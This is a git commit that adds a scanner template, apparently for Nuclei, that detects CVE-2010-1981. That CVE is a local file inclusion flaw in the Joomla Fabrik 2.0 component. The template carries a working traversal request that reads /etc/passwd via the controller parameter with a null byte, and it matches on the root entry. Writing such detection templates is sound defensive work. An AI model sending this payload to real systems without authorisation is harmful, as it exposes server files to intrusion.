Create CVE-2010-1981.yaml

patch-1
Muhammad Daffa 2021-09-01 15:29:40 +07:00 committed by GitHub
parent d6e681f871
commit 510b70d1ae
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 27 additions and 0 deletions

View File

@ -0,0 +1,27 @@
id: CVE-2010-1981
info:
name: Joomla! Component Fabrik 2.0 - Local File Inclusion
author: daffainfo
severity: high
description: Directory traversal vulnerability in the Fabrik (com_fabrik) component 2.0 for Joomla! allows remote attackers to read arbitrary files via a .. (dot dot) in the controller parameter to index.php.
reference:
- https://www.exploit-db.com/exploits/12087
- https://www.cvedetails.com/cve/CVE-2010-1981
tags: cve,cve2010,joomla,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_fabrik&controller=../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0"
- type: status
status:
- 200